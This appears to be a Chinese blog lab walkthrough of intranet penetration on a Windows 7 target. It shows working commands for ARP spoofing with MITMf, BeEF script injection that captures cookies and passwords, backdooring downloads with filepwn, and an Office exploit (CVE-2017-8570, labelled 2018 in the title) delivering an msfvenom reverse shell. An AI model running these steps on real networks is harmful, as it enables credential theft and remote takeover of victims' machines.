MITMF + MSF +BEEF + CVE-2018-8570

使用MITMF + MSF +BEEF + CVE-2018-8570实现内网渗透
安装MITMF:目前2019.1a以上的版本kali已经没有携带mitmf,需自行安装,但目前的安装方法已经失效,而我众和多种方案,查阅相关资料,成功安装,以下是我的安装方法。
a)先安装解决所需要的包依赖

apt install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

b)使用克隆的模式下载到MITMF

git clone https://github.com/byt3bl33dr/MITMF

在这里插入图片描述
c)进入MITMF的目录中,进行初始化本地.gitmodules文件git submodule init ,再同步远端submodule 源码git submodule update,最后使用recursive参数进行初始化子模块

cd MITMF && git submodule init && git submodule update –resursive

在这里插入图片描述
d)再进行安装

pip install –r requirements.txt

在这里插入图片描述
e)启动
在这里插入图片描述
注意:我在安装requirements.txt的时候,出现下面截图的错误信息
解决方案:此处的问题是没有安装python-magic使用以下命令解决

pip install python-magic && git clone https://github.com/secretsquirrel/the-backdoor-factory.git && cd the-backdoor-factory && ./install.sh

复现中间人攻击窃取浏览器页面信息
(一)实验环境:KALI,Windows 7
(二)使用工具:KALI下MITMF、Beef
查看MITMF是否安装成功,执行python mitmf.py –help,出现以下截图画面表示成功安装。
在这里插入图片描述
开启beef,使用beef-xss命令启动beef
在这里插入图片描述
自动弹出登陆界面,用户名和密码默认beef
在这里插入图片描述
执行

python mitmf.py --spoof --arp -i eth0 --gateway 192.168.153.2 --target 192.168.153.129 --inject --js-url http://192.168.153.128:3000/hook.js

其中–spoof是 ,–arp表示使用arp攻击,-i接自己的网卡eth0,–gateway表示网关,–targat表示目标主机,–inject表示注入,后面–js-url表示注入js后返回到链接页面。执行情况如下:
在这里插入图片描述
此时表示已经成功欺骗
在这里插入图片描述
4)当目标靶机打开浏览器访问相关网络时,便会发生xss凌空注入。使用靶机打开淘宝时候,MITMF开始运作,开始进行注入。注入成功后右击查看源代码,可以看到有一串注入成功的xss代码

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
此时再打开beef的网页发现有目标主机以及访问页面可获得cookie以及操作系统版本、CPU、时间、浏览器信息等
在这里插入图片描述
在靶机上点击登陆淘宝的个人账户
在这里插入图片描述
在登陆界面输入对应的用户名及密码,zhu和123456
在这里插入图片描述
在攻击机里面出现对应的用户名及密码
在这里插入图片描述
弹窗的js脚步注入

python mitmf.py --spoof --arp -i eth0 --gateway 192.168.153.2 --target 192.168.153.129 --inject --js-url http://192.168.153.128/1.js

在这里插入图片描述
弹框
在这里插入图片描述
对目标靶机浏览器进行截图,执行以下命令

python mitmf.py --spoof --arp -i eth0 --gateway 192.168.153.2 --target 192.168.153.129 --screen 

在这里插入图片描述
在这里插入图片描述
启动启动msf,加载msgrpc模块

service postgresql start && msfconsole load msgrpc

在这里插入图片描述
在这里插入图片描述
为msf设置LHOST和LPORT
在这里插入图片描述
修改mitmf的HOST和PORT

vim /usr/share/mitmf/config/mitmf.conf

在这里插入图片描述
开启filepwn

mitmf --spoof --arp -i eth0 --gateway 192.168.153.2 --target 192.168.153.129 --filepwn

在这里插入图片描述
在这里插入图片描述
filepwn的原理就是在靶机下载可执行程序时将木马插入程序里,执行程序时就会启动木马,所以接下来我用靶机下载一个putty程序
在这里插入图片描述
接着msf监听到192.168.153.129的回应
在这里插入图片描述
使用sessions,查看可用模块
在这里插入图片描述
选择sessions 1

sessions –i 1

在这里插入图片描述
在此虽然拿到了meterpreter,但是,可能是我的win7版本问题或是MITMF自身问题导致没办法提权,在此这边改为利用CVE-2017-8570漏洞来提取
先生成PPSX文件

python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx 
–u http://192.168.153.128/logo.doc

在这里插入图片描述
接着生成exe的shell文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.128 LPORT=6666 -f exe > /tmp/shell.exe

在这里插入图片描述
接着使用mitmf的arp欺骗功能,使其打开网页便弹出下载内容
在这里插入图片描述
在这里插入图片描述
当靶机下载后,使用mtf监听端口,等待靶机连接
在这里插入图片描述
成功连接如图下:
在这里插入图片描述
拿到meterpreter,使用ipconfig命令
在这里插入图片描述
成功提权
在这里插入图片描述
在这里插入图片描述

发布了7 篇原创文章 · 获赞 5 · 访问量 599

猜你喜欢

转载自blog.csdn.net/qq_44902875/article/details/103283388
msf
今日推荐